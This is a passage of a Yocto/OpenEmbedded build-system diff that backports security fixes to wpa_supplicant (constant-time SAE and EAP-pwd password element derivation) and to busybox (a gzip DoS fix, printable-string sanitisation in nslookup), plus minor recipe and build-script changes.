281+ const struct crypto_bignum *b,
282+ struct crypto_bignum *c)
283+{
284+ if (TEST_FAIL())
285+ return -1;
286+
287+ return mp_sqrmod((mp_int *) a, (mp_int *) b,
288+ (mp_int *) c) == MP_OKAY ? 0 : -1;
289+}
290+
291+
292+int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
293+ const struct crypto_bignum *b,
294+ struct crypto_bignum *c)
295+{
296+ /* TODO */
297+ return -1;
298+}
299+
300+
301 int crypto_bignum_rshift(const struct crypto_bignum *a, int n,
302 struct crypto_bignum *r)
303 {
304@@ -1386,6 +1440,18 @@ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e)
305 }
306
307
308+const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e)
309+{
310+ return (const struct crypto_bignum *) &e->a;
311+}
312+
313+
314+const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e)
315+{
316+ return (const struct crypto_bignum *) &e->b;
317+}
318+
319+
320 void crypto_ec_point_deinit(struct crypto_ec_point *p, int clear)
321 {
322 ecc_point *point = (ecc_point *) p;
323--
3242.25.1
325
326From 2232d3d5f188b65dbb6c823ac62175412739eb16 Mon Sep 17 00:00:00 2001
327From: Jouni Malinen <j@w1.fi>
328Date: Fri, 7 Jan 2022 13:47:16 +0200
329Subject: [PATCH 2/4] dragonfly: Add sqrt() helper function
330
331This is a backport of "SAE: Move sqrt() implementation into a helper
332function" to introduce the helper function needed for the following
333patches.
334
335Signed-off-by: Jouni Malinen <j@w1.fi>
336---
337 src/common/dragonfly.c | 34 ++++++++++++++++++++++++++++++++++
338 src/common/dragonfly.h | 2 ++
339 2 files changed, 36 insertions(+)
340
341diff --git a/src/common/dragonfly.c b/src/common/dragonfly.c
342index 547be66f1561..1e842716668e 100644
343--- a/src/common/dragonfly.c
344+++ b/src/common/dragonfly.c
345@@ -213,3 +213,37 @@ int dragonfly_generate_scalar(const struct crypto_bignum *order,
346 "dragonfly: Unable to get randomness for own scalar");
347 return -1;
348 }
349+
350+
351+/* res = sqrt(val) */
352+int dragonfly_sqrt(struct crypto_ec *ec, const struct crypto_bignum *val,
353+ struct crypto_bignum *res)
354+{
355+ const struct crypto_bignum *prime;
356+ struct crypto_bignum *tmp, *one;
357+ int ret = 0;
358+ u8 prime_bin[DRAGONFLY_MAX_ECC_PRIME_LEN];
359+ size_t prime_len;
360+
361+ /* For prime p such that p = 3 mod 4, sqrt(w) = w^((p+1)/4) mod p */
362+
363+ prime = crypto_ec_get_prime(ec);
364+ prime_len = crypto_ec_prime_len(ec);
365+ tmp = crypto_bignum_init();
366+ one = crypto_bignum_init_uint(1);
367+
368+ if (crypto_bignum_to_bin(prime, prime_bin, sizeof(prime_bin),
369+ prime_len) < 0 ||
370+ (prime_bin[prime_len - 1] & 0x03) != 3 ||
371+ !tmp || !one ||
372+ /* tmp = (p+1)/4 */
373+ crypto_bignum_add(prime, one, tmp) < 0 ||
374+ crypto_bignum_rshift(tmp, 2, tmp) < 0 ||
375+ /* res = sqrt(val) */
376+ crypto_bignum_exptmod(val, tmp, prime, res) < 0)
377+ ret = -1;
378+
379+ crypto_bignum_deinit(tmp, 0);
380+ crypto_bignum_deinit(one, 0);
381+ return ret;
382+}
383diff --git a/src/common/dragonfly.h b/src/common/dragonfly.h
384index ec3dd593eda4..84d67f575c54 100644
385--- a/src/common/dragonfly.h
386+++ b/src/common/dragonfly.h
387@@ -27,5 +27,7 @@ int dragonfly_generate_scalar(const struct crypto_bignum *order,
388 struct crypto_bignum *_rand,
389 struct crypto_bignum *_mask,
390 struct crypto_bignum *scalar);
391+int dragonfly_sqrt(struct crypto_ec *ec, const struct crypto_bignum *val,
392+ struct crypto_bignum *res);
393
394 #endif /* DRAGONFLY_H */
395--
3962.25.1
397
398From fe534b0baaa8c0e6ddeb24cf529d6e50e33dc501 Mon Sep 17 00:00:00 2001
399From: Jouni Malinen <j@w1.fi>
400Date: Fri, 7 Jan 2022 13:47:16 +0200
401Subject: [PATCH 3/4] SAE: Derive the y coordinate for PWE with own
402 implementation
403
404The crypto_ec_point_solve_y_coord() wrapper function might not use
405constant time operations in the crypto library and as such, could leak
406side channel information about the password that is used to generate the
407PWE in the hunting and pecking loop. As such, calculate the two possible
408y coordinate values and pick the correct one to use with constant time
409selection.
410
411Signed-off-by: Jouni Malinen <j@w1.fi>
412---
413 src/common/sae.c | 47 +++++++++++++++++++++++++++++++++--------------
414 1 file changed, 33 insertions(+), 14 deletions(-)
415
416diff --git a/src/common/sae.c b/src/common/sae.c
417index 08fdbfd18173..8d79ed962768 100644
418--- a/src/common/sae.c
419+++ b/src/common/sae.c
420@@ -286,14 +286,16 @@ static int sae_derive_pwe_ecc(struct sae_data *sae, const u8 *addr1,
421 int pwd_seed_odd = 0;
422 u8 prime[SAE_MAX_ECC_PRIME_LEN];
423 size_t prime_len;
424- struct crypto_bignum *x = NULL, *qr = NULL, *qnr = NULL;
425+ struct crypto_bignum *x = NULL, *y = NULL, *qr = NULL, *qnr = NULL;
426 u8 x_bin[SAE_MAX_ECC_PRIME_LEN];
427 u8 x_cand_bin[SAE_MAX_ECC_PRIME_LEN];
428 u8 qr_bin[SAE_MAX_ECC_PRIME_LEN];
429 u8 qnr_bin[SAE_MAX_ECC_PRIME_LEN];
430+ u8 x_y[2 * SAE_MAX_ECC_PRIME_LEN];
431 int res = -1;
432 u8 found = 0; /* 0 (false) or 0xff (true) to be used as const_time_*
433 * mask */
434+ unsigned int is_eq;
435
436 os_memset(x_bin, 0, sizeof(x_bin));
437
438@@ -402,25 +404,42 @@ static int sae_derive_pwe_ecc(struct sae_data *sae, const u8 *addr1,
439 goto fail;
440 }
441
442- if (!sae->tmp->pwe_ecc)
443- sae->tmp->pwe_ecc = crypto_ec_point_init(sae->tmp->ec);
444- if (!sae->tmp->pwe_ecc)
445- res = -1;
446- else
447- res = crypto_ec_point_solve_y_coord(sae->tmp->ec,
448- sae->tmp->pwe_ecc, x,
449- pwd_seed_odd);
450- if (res < 0) {
451- /*
452- * This should not happen since we already checked that there
453- * is a result.
454- */
455+ /* y = sqrt(x^3 + ax + b) mod p
456+ * if LSB(save) == LSB(y): PWE = (x, y)
457+ * else: PWE = (x, p - y)
458+ *
459+ * Calculate y and the two possible values for PWE and after that,
460+ * use constant time selection to copy the correct alternative.
461+ */
462+ y = crypto_ec_point_compute_y_sqr(sae->tmp->ec, x);
463+ if (!y ||
464+ dragonfly_sqrt(sae->tmp->ec, y, y) < 0 ||
465+ crypto_bignum_to_bin(y, x_y, SAE_MAX_ECC_PRIME_LEN,
466+ prime_len) < 0 ||
467+ crypto_bignum_sub(sae->tmp->prime, y, y) < 0 ||
468+ crypto_bignum_to_bin(y, x_y + SAE_MAX_ECC_PRIME_LEN,
469+ SAE_MAX_ECC_PRIME_LEN, prime_len) < 0) {
470 wpa_printf(MSG_DEBUG, "SAE: Could not solve y");
471+ goto fail;
472+ }
473+
474+ is_eq = const_time_eq(pwd_seed_odd, x_y[prime_len - 1] & 0x01);
475+ const_time_select_bin(is_eq, x_y, x_y + SAE_MAX_ECC_PRIME_LEN,
476+ prime_len, x_y + prime_len);
477+ os_memcpy(x_y, x_bin, prime_len);
478+ wpa_hexdump_key(MSG_DEBUG, "SAE: PWE", x_y, 2 * prime_len);
479+ crypto_ec_point_deinit(sae->tmp->pwe_ecc, 1);
480+ sae->tmp->pwe_ecc = crypto_ec_point_from_bin(sae->tmp->ec, x_y);
481+ if (!sae->tmp->pwe_ecc) {
482+ wpa_printf(MSG_DEBUG, "SAE: Could not generate PWE");
483+ res = -1;
484 }
485
486 fail:
487+ forced_memzero(x_y, sizeof(x_y));
488 crypto_bignum_deinit(qr, 0);
489 crypto_bignum_deinit(qnr, 0);
490+ crypto_bignum_deinit(y, 1);
491 os_free(dummy_password);
492 bin_clear_free(tmp_password, password_len);
493 crypto_bignum_deinit(x, 1);
494--
4952.25.1
496
497From 603cd880e7f90595482658a7136fa6a7be5cb485 Mon Sep 17 00:00:00 2001
498From: Jouni Malinen <j@w1.fi>
499Date: Fri, 7 Jan 2022 18:52:27 +0200
500Subject: [PATCH 4/4] EAP-pwd: Derive the y coordinate for PWE with own
501 implementation
502
503The crypto_ec_point_solve_y_coord() wrapper function might not use
504constant time operations in the crypto library and as such, could leak
505side channel information about the password that is used to generate the
506PWE in the hunting and pecking loop. As such, calculate the two possible
507y coordinate values and pick the correct one to use with constant time
508selection.
509
510Signed-off-by: Jouni Malinen <j@w1.fi>
511---
512 src/eap_common/eap_pwd_common.c | 46 ++++++++++++++++++++++++++-------
513 1 file changed, 36 insertions(+), 10 deletions(-)
514
515diff --git a/src/eap_common/eap_pwd_common.c b/src/eap_common/eap_pwd_common.c
516index 2b2b8efdbd01..ff22b29b087a 100644
517--- a/src/eap_common/eap_pwd_common.c
518+++ b/src/eap_common/eap_pwd_common.c
519@@ -127,7 +127,8 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
520 u8 qr_or_qnr_bin[MAX_ECC_PRIME_LEN];
521 u8 x_bin[MAX_ECC_PRIME_LEN];
522 u8 prime_bin[MAX_ECC_PRIME_LEN];
523- struct crypto_bignum *tmp2 = NULL;
524+ u8 x_y[2 * MAX_ECC_PRIME_LEN];
525+ struct crypto_bignum *tmp2 = NULL, *y = NULL;
526 struct crypto_hash *hash;
527 unsigned char pwe_digest[SHA256_MAC_LEN], *prfbuf = NULL, ctr;
528 int ret = 0, res;
529@@ -139,6 +140,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
530 u8 found_ctr = 0, is_odd = 0;
531 int cmp_prime;
532 unsigned int in_range;
533+ unsigned int is_eq;
534
535 if (grp->pwe)
536 return -1;
537@@ -151,11 +153,6 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
538 if (crypto_bignum_to_bin(prime, prime_bin, sizeof(prime_bin),
539 primebytelen) < 0)
540 return -1;
541- grp->pwe = crypto_ec_point_init(grp->group);
542- if (!grp->pwe) {
543- wpa_printf(MSG_INFO, "EAP-pwd: unable to create bignums");
544- goto fail;
545- }
546
547 if ((prfbuf = os_malloc(primebytelen)) == NULL) {
548 wpa_printf(MSG_INFO, "EAP-pwd: unable to malloc space for prf "
549@@ -261,10 +258,37 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
550 */
551 crypto_bignum_deinit(x_candidate, 1);
552 x_candidate = crypto_bignum_init_set(x_bin, primebytelen);
553- if (!x_candidate ||
554- crypto_ec_point_solve_y_coord(grp->group, grp->pwe, x_candidate,
555- is_odd) != 0) {
556- wpa_printf(MSG_INFO, "EAP-pwd: Could not solve for y");
557+ if (!x_candidate)
558+ goto fail;
559+
560+ /* y = sqrt(x^3 + ax + b) mod p
561+ * if LSB(y) == LSB(pwd-seed): PWE = (x, y)
562+ * else: PWE = (x, p - y)
563+ *
564+ * Calculate y and the two possible values for PWE and after that,
565+ * use constant time selection to copy the correct alternative.
566+ */
567+ y = crypto_ec_point_compute_y_sqr(grp->group, x_candidate);
568+ if (!y ||
569+ dragonfly_sqrt(grp->group, y, y) < 0 ||
570+ crypto_bignum_to_bin(y, x_y, MAX_ECC_PRIME_LEN, primebytelen) < 0 ||
571+ crypto_bignum_sub(prime, y, y) < 0 ||
572+ crypto_bignum_to_bin(y, x_y + MAX_ECC_PRIME_LEN,
573+ MAX_ECC_PRIME_LEN, primebytelen) < 0) {
574+ wpa_printf(MSG_DEBUG, "SAE: Could not solve y");
575+ goto fail;
576+ }
577+
578+ /* Constant time selection of the y coordinate from the two
579+ * options */
580+ is_eq = const_time_eq(is_odd, x_y[primebytelen - 1] & 0x01);
581+ const_time_select_bin(is_eq, x_y, x_y + MAX_ECC_PRIME_LEN,
582+ primebytelen, x_y + primebytelen);
583+ os_memcpy(x_y, x_bin, primebytelen);
584+ wpa_hexdump_key(MSG_DEBUG, "EAP-pwd: PWE", x_y, 2 * primebytelen);
585+ grp->pwe = crypto_ec_point_from_bin(grp->group, x_y);
586+ if (!grp->pwe) {
587+ wpa_printf(MSG_DEBUG, "EAP-pwd: Could not generate PWE");
588 goto fail;
589 }
590
591@@ -289,6 +313,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
592 /* cleanliness and order.... */
593 crypto_bignum_deinit(x_candidate, 1);
594 crypto_bignum_deinit(tmp2, 1);
595+ crypto_bignum_deinit(y, 1);
596 crypto_bignum_deinit(qr, 1);
597 crypto_bignum_deinit(qnr, 1);
598 bin_clear_free(prfbuf, primebytelen);
599@@ -296,6 +321,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
600 os_memset(qnr_bin, 0, sizeof(qnr_bin));
601 os_memset(qr_or_qnr_bin, 0, sizeof(qr_or_qnr_bin));
602 os_memset(pwe_digest, 0, sizeof(pwe_digest));
603+ forced_memzero(x_y, sizeof(x_y));
604
605 return ret;
606 }
607--
6082.25.1
609
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
index 7cc03fef7d..a8fb34b1a1 100644
--- a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Client for Wi-Fi Protected Access (WPA)" 1SUMMARY = "Client for Wi-Fi Protected Access (WPA)"
2HOMEPAGE = "http://w1.fi/wpa_supplicant/" 2HOMEPAGE = "http://w1.fi/wpa_supplicant/"
3DESCRIPTION = "wpa_supplicant is a WPA Supplicant for Linux, BSD, Mac OS X, and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver."
3BUGTRACKER = "http://w1.fi/security/" 4BUGTRACKER = "http://w1.fi/security/"
4SECTION = "network" 5SECTION = "network"
5LICENSE = "BSD-3-Clause" 6LICENSE = "BSD-3-Clause"
@@ -29,6 +30,10 @@ SRC_URI = "http://w1.fi/releases/wpa_supplicant-${PV}.tar.gz \
29 file://0001-WPS-UPnP-Do-not-allow-event-subscriptions-with-URLs-.patch \ 30 file://0001-WPS-UPnP-Do-not-allow-event-subscriptions-with-URLs-.patch \
30 file://0002-WPS-UPnP-Fix-event-message-generation-using-a-long-U.patch \ 31 file://0002-WPS-UPnP-Fix-event-message-generation-using-a-long-U.patch \
31 file://0003-WPS-UPnP-Handle-HTTP-initiation-failures-for-events-.patch \ 32 file://0003-WPS-UPnP-Handle-HTTP-initiation-failures-for-events-.patch \
33 file://CVE-2021-0326.patch \
34 file://CVE-2021-27803.patch \
35 file://CVE-2021-30004.patch \
36 file://CVE-2022-23303-4.patch \
32 " 37 "
33SRC_URI[md5sum] = "2d2958c782576dc9901092fbfecb4190" 38SRC_URI[md5sum] = "2d2958c782576dc9901092fbfecb4190"
34SRC_URI[sha256sum] = "fcbdee7b4a64bea8177973299c8c824419c413ec2e3a95db63dd6a5dc3541f17" 39SRC_URI[sha256sum] = "fcbdee7b4a64bea8177973299c8c824419c413ec2e3a95db63dd6a5dc3541f17"
diff --git a/meta/recipes-core/base-files/base-files/hosts b/meta/recipes-core/base-files/base-files/hosts
index b94f414d5c..10a5b6c704 100644
--- a/meta/recipes-core/base-files/base-files/hosts
+++ b/meta/recipes-core/base-files/base-files/hosts
@@ -1,4 +1,4 @@
1127.0.0.1 localhost.localdomain localhost 1127.0.0.1 localhost
2 2
3# The following lines are desirable for IPv6 capable hosts 3# The following lines are desirable for IPv6 capable hosts
4::1 localhost ip6-localhost ip6-loopback 4::1 localhost ip6-localhost ip6-loopback
diff --git a/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb b/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
index d01cd7e297..65b3cd778d 100644
--- a/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
+++ b/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Base system master password/group files" 1SUMMARY = "Base system master password/group files"
2DESCRIPTION = "The master copies of the user database files (/etc/passwd and /etc/group). The update-passwd tool is also provided to keep the system databases synchronized with these master files." 2DESCRIPTION = "The master copies of the user database files (/etc/passwd and /etc/group). The update-passwd tool is also provided to keep the system databases synchronized with these master files."
3HOMEPAGE = "https://launchpad.net/base-passwd"
3SECTION = "base" 4SECTION = "base"
4LICENSE = "GPLv2" 5LICENSE = "GPLv2"
5LIC_FILES_CHKSUM = "file://COPYING;md5=eb723b61539feef013de476e68b5c50a" 6LIC_FILES_CHKSUM = "file://COPYING;md5=eb723b61539feef013de476e68b5c50a"
diff --git a/meta/recipes-core/busybox/busybox.inc b/meta/recipes-core/busybox/busybox.inc
index e0522be729..f0c5666f47 100644
--- a/meta/recipes-core/busybox/busybox.inc
+++ b/meta/recipes-core/busybox/busybox.inc
@@ -139,6 +139,10 @@ do_configure () {
139 do_prepare_config 139 do_prepare_config
140 merge_config.sh -m .config ${@" ".join(find_cfgs(d))} 140 merge_config.sh -m .config ${@" ".join(find_cfgs(d))}
141 cml1_do_configure 141 cml1_do_configure
142
143 # Save a copy of .config and autoconf.h.
144 cp .config .config.orig
145 cp include/autoconf.h include/autoconf.h.orig
142} 146}
143 147
144do_compile() { 148do_compile() {
@@ -146,13 +150,17 @@ do_compile() {
146 if [ "${BUILD_REPRODUCIBLE_BINARIES}" = "1" ]; then 150 if [ "${BUILD_REPRODUCIBLE_BINARIES}" = "1" ]; then
147 export KCONFIG_NOTIMESTAMP=1 151 export KCONFIG_NOTIMESTAMP=1
148 fi 152 fi
153
154 # Ensure we start do_compile with the original .config and autoconf.h.
155 # These files should always have matching timestamps.
156 cp .config.orig .config
157 cp include/autoconf.h.orig include/autoconf.h
158
149 if [ "${BUSYBOX_SPLIT_SUID}" = "1" -a x`grep "CONFIG_FEATURE_INDIVIDUAL=y" .config` = x ]; then 159 if [ "${BUSYBOX_SPLIT_SUID}" = "1" -a x`grep "CONFIG_FEATURE_INDIVIDUAL=y" .config` = x ]; then
160 # Guard againt interrupted do_compile: clean temporary files.
161 rm -f .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
162
150 # split the .config into two parts, and make two busybox binaries 163 # split the .config into two parts, and make two busybox binaries
151 if [ -e .config.orig ]; then
152 # Need to guard again an interrupted do_compile - restore any backup
153 cp .config.orig .config
154 fi
155 cp .config .config.orig
156 oe_runmake busybox.cfg.suid 164 oe_runmake busybox.cfg.suid
157 oe_runmake busybox.cfg.nosuid 165 oe_runmake busybox.cfg.nosuid
158 166
@@ -189,15 +197,18 @@ do_compile() {
189 bbfatal "busybox suid binary incorrectly provides /bin/sh" 197 bbfatal "busybox suid binary incorrectly provides /bin/sh"
190 fi 198 fi
191 199
192 # copy .config.orig back to .config, because the install process may check this file
193 cp .config.orig .config
194 # cleanup 200 # cleanup
195 rm .config.orig .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps 201 rm .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
196 else 202 else
197 oe_runmake busybox_unstripped 203 oe_runmake busybox_unstripped
198 cp busybox_unstripped busybox 204 cp busybox_unstripped busybox
199 oe_runmake busybox.links 205 oe_runmake busybox.links
200 fi 206 fi
207
208 # restore original .config and autoconf.h, because the install process
209 # may check these files
210 cp .config.orig .config
211 cp include/autoconf.h.orig include/autoconf.h
201} 212}
202 213
203do_install () { 214do_install () {
@@ -348,7 +359,7 @@ do_install_ptest () {
348 # These access the internet which is not guaranteed to work on machines running the tests 359 # These access the internet which is not guaranteed to work on machines running the tests
349 rm -rf ${D}${PTEST_PATH}/testsuite/wget 360 rm -rf ${D}${PTEST_PATH}/testsuite/wget
350 sort ${B}/.config > ${D}${PTEST_PATH}/.config 361 sort ${B}/.config > ${D}${PTEST_PATH}/.config
351 ln -s /bin/busybox ${D}${PTEST_PATH}/busybox 362 ln -s ${base_bindir}/busybox ${D}${PTEST_PATH}/busybox
352} 363}
353 364
354inherit update-alternatives 365inherit update-alternatives
diff --git a/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch b/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch
new file mode 100644
index 0000000000..b75f0907e7
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch
@@ -0,0 +1,51 @@
1From fe791386ebc270219ca00406c9fdadc5130b64ee Mon Sep 17 00:00:00 2001
2From: Samuel Sapalski <samuel.sapalski@nokia.com>
3Date: Wed, 3 Mar 2021 16:31:22 +0100
4Subject: [PATCH] decompress_gunzip: Fix DoS if gzip is corrupt
5
6On certain corrupt gzip files, huft_build will set the error bit on
7the result pointer. If afterwards abort_unzip is called huft_free
8might run into a segmentation fault or an invalid pointer to
9free(p).
10
11In order to mitigate this, we check in huft_free if the error bit
12is set and clear it before the linked list is freed.
13
14Signed-off-by: Samuel Sapalski <samuel.sapalski@nokia.com>
15Signed-off-by: Peter Kaestle <peter.kaestle@nokia.com>
16Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
17
18Upstream-Status: Backport
19CVE: CVE-2021-28831
20Comment: One hunk from this patch is removed as it was not relevant.
21Signed-off-by: Chen Qi <Qi.Chen@windriver.com>
22Signed-off-by: Akash Hadke <Akash.Hadke@kpit.com>
23---
24 archival/libarchive/decompress_gunzip.c | 12 ++++++++++--
25 1 file changed, 10 insertions(+), 2 deletions(-)
26
27diff --git a/archival/libarchive/decompress_gunzip.c b/archival/libarchive/decompress_gunzip.c
28index eb3b64930..e93cd5005 100644
29--- a/archival/libarchive/decompress_gunzip.c
30+++ b/archival/libarchive/decompress_gunzip.c
31@@ -220,10 +220,20 @@ static const uint8_t border[] ALIGN1 = {
32 * each table.
33 * t: table to free
34 */
35+#define BAD_HUFT(p) ((uintptr_t)(p) & 1)
36+#define ERR_RET ((huft_t*)(uintptr_t)1)
37 static void huft_free(huft_t *p)
38 {
39 huft_t *q;
40
41+ /*
42+ * If 'p' has the error bit set we have to clear it, otherwise we might run
43+ * into a segmentation fault or an invalid pointer to free(p)
44+ */
45+ if (BAD_HUFT(p)) {
46+ p = (huft_t*)((uintptr_t)(p) ^ (uintptr_t)(ERR_RET));
47+ }
48+
49 /* Go through linked list, freeing from the malloced (t[-1]) address. */
50 while (p) {
51 q = (--p)->v.t;
diff --git a/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch b/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch
new file mode 100644
index 0000000000..18bf5f19e4
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch
@@ -0,0 +1,38 @@
1From c7e181fdf58c392e06ab805e2c044c3e57d5445a Mon Sep 17 00:00:00 2001
2From: Ariadne Conill <ariadne@dereferenced.org>
3Date: Sun, 3 Apr 2022 12:14:33 +0000
4Subject: [PATCH] libbb: sockaddr2str: ensure only printable characters are
5 returned for the hostname part
6
7CVE: CVE-2022-28391
8Upstream-Status: Pending
9Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
10Signed-off-by: Steve Sakoman <steve@sakoman.com>
11---
12 libbb/xconnect.c | 5 +++--
13 1 file changed, 3 insertions(+), 2 deletions(-)
14
15diff --git a/libbb/xconnect.c b/libbb/xconnect.c
16index eb2871cb1..b5520bb21 100644
17--- a/libbb/xconnect.c
18+++ b/libbb/xconnect.c
19@@ -501,8 +501,9 @@ static char* FAST_FUNC sockaddr2str(const struct sockaddr *sa, int flags)
20 );
21 if (rc)
22 return NULL;
23+ /* ensure host contains only printable characters */
24 if (flags & IGNORE_PORT)
25- return xstrdup(host);
26+ return xstrdup(printable_string(host));
27 #if ENABLE_FEATURE_IPV6
28 if (sa->sa_family == AF_INET6) {
29 if (strchr(host, ':')) /* heh, it's not a resolved hostname */
30@@ -513,7 +514,7 @@ static char* FAST_FUNC sockaddr2str(const struct sockaddr *sa, int flags)
31 #endif
32 /* For now we don't support anything else, so it has to be INET */
33 /*if (sa->sa_family == AF_INET)*/
34- return xasprintf("%s:%s", host, serv);
35+ return xasprintf("%s:%s", printable_string(host), serv);
36 /*return xstrdup(host);*/
37 }
38
diff --git a/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch b/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch
new file mode 100644
index 0000000000..4a1960dff2
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch
@@ -0,0 +1,81 @@
1From ceb378209f953ea745ed93a8645567196380ce3c Mon Sep 17 00:00:00 2001
2From: Andrej Valek <andrej.valek@siemens.com>
3Date: Thu, 24 Jun 2021 19:13:22 +0200
4Subject: [PATCH] mktemp: add tmpdir option
5
6Make mktemp more compatible with coreutils.
7- add "--tmpdir" option
8- add long variants for "d,q,u" options
9
10Upstream-Status: Submitted [http://lists.busybox.net/pipermail/busybox/2021-June/088932.html]
11
12Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
13Signed-off-by: Peter Marko <peter.marko@siemens.com>
14---
15 coreutils/mktemp.c | 26 ++++++++++++++++++--------
16 1 file changed, 18 insertions(+), 8 deletions(-)
17
18diff --git a/coreutils/mktemp.c b/coreutils/mktemp.c
19index 5393320a5..05c6d98c6 100644
20--- a/coreutils/mktemp.c
21+++ b/coreutils/mktemp.c
22@@ -39,16 +39,17 @@
23 //kbuild:lib-$(CONFIG_MKTEMP) += mktemp.o
24
25 //usage:#define mktemp_trivial_usage
26-//usage: "[-dt] [-p DIR] [TEMPLATE]"
27+//usage: "[-dt] [-p DIR, --tmpdir[=DIR]] [TEMPLATE]"
28 //usage:#define mktemp_full_usage "\n\n"
29 //usage: "Create a temporary file with name based on TEMPLATE and print its name.\n"
30 //usage: "TEMPLATE must end with XXXXXX (e.g. [/dir/]nameXXXXXX).\n"
31 //usage: "Without TEMPLATE, -t tmp.XXXXXX is assumed.\n"
32-//usage: "\n -d Make directory, not file"
33-//usage: "\n -q Fail silently on errors"
34-//usage: "\n -t Prepend base directory name to TEMPLATE"
35-//usage: "\n -p DIR Use DIR as a base directory (implies -t)"
36-//usage: "\n -u Do not create anything; print a name"
37+//usage: "\n -d Make directory, not file"
38+//usage: "\n -q Fail silently on errors"
39+//usage: "\n -t Prepend base directory name to TEMPLATE"
40+//usage: "\n -p DIR, --tmpdir[=DIR] Use DIR as a base directory (implies -t)"
41+//usage: "\n For --tmpdir is a optional one."
42+//usage: "\n -u Do not create anything; print a name"
43 //usage: "\n"
44 //usage: "\nBase directory is: -p DIR, else $TMPDIR, else /tmp"
45 //usage:
46@@ -72,13 +73,22 @@ int mktemp_main(int argc UNUSED_PARAM, char **argv)
47 OPT_t = 1 << 2,
48 OPT_p = 1 << 3,
49 OPT_u = 1 << 4,
50+ OPT_td = 1 << 5,
51 };
52
53 path = getenv("TMPDIR");
54 if (!path || path[0] == '\0')
55 path = "/tmp";
56
57- opts = getopt32(argv, "^" "dqtp:u" "\0" "?1"/*1 arg max*/, &path);
58+ opts = getopt32long(argv, "^"
59+ "dqtp:u\0"
60+ "?1" /* 1 arg max */,
61+ "directory\0" No_argument "d"
62+ "quiet\0" No_argument "q"
63+ "dry-run\0" No_argument "u"
64+ "tmpdir\0" Optional_argument "\xff"
65+ , &path, &path
66+ );
67
68 chp = argv[optind];
69 if (!chp) {
70@@ -95,7 +105,7 @@ int mktemp_main(int argc UNUSED_PARAM, char **argv)
71 goto error;
72 }
73 #endif
74- if (opts & (OPT_t|OPT_p))
75+ if (opts & (OPT_t|OPT_p|OPT_td))
76 chp = concat_path_file(path, chp);
77
78 if (opts & OPT_u) {
79--
802.11.0
81
diff --git a/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch b/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch
new file mode 100644
index 0000000000..2c9da33a51
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch
@@ -0,0 +1,64 @@
1From f8ad7c331b25ba90fd296b37c443b4114cb196e2 Mon Sep 17 00:00:00 2001
2From: Ariadne Conill <ariadne@dereferenced.org>
3Date: Sun, 3 Apr 2022 12:16:45 +0000
4Subject: [PATCH] nslookup: sanitize all printed strings with printable_string
5
6Otherwise, terminal sequences can be injected, which enables various terminal injection
7attacks from DNS results.
8
9MJ: One chunk wasn't applicable on 1.31.1 version, because parsing of
10SRV records was added only in newer 1.32.0 with:
11 commit 6b4960155e94076bf25518e4e268a7a5f849308e
12 Author: Jo-Philipp Wich <jo@mein.io>
13 Date: Thu Jun 27 17:27:29 2019 +0200
14
15 nslookup: implement support for SRV records
16
17CVE: CVE-2022-28391
18Upstream-Status: Pending
19Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
20Signed-off-by: Steve Sakoman <steve@sakoman.com>
21---
22 networking/nslookup.c | 8 ++++----
23 1 file changed, 4 insertions(+), 4 deletions(-)
24
25diff --git a/networking/nslookup.c b/networking/nslookup.c
26index 24e09d4f0..89b9c8a13 100644
27--- a/networking/nslookup.c
28+++ b/networking/nslookup.c
29@@ -404,7 +404,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
30 //printf("Unable to uncompress domain: %s\n", strerror(errno));
31 return -1;
32 }
33- printf(format, ns_rr_name(rr), dname);
34+ printf(format, ns_rr_name(rr), printable_string(dname));
35 break;
36
37 case ns_t_mx:
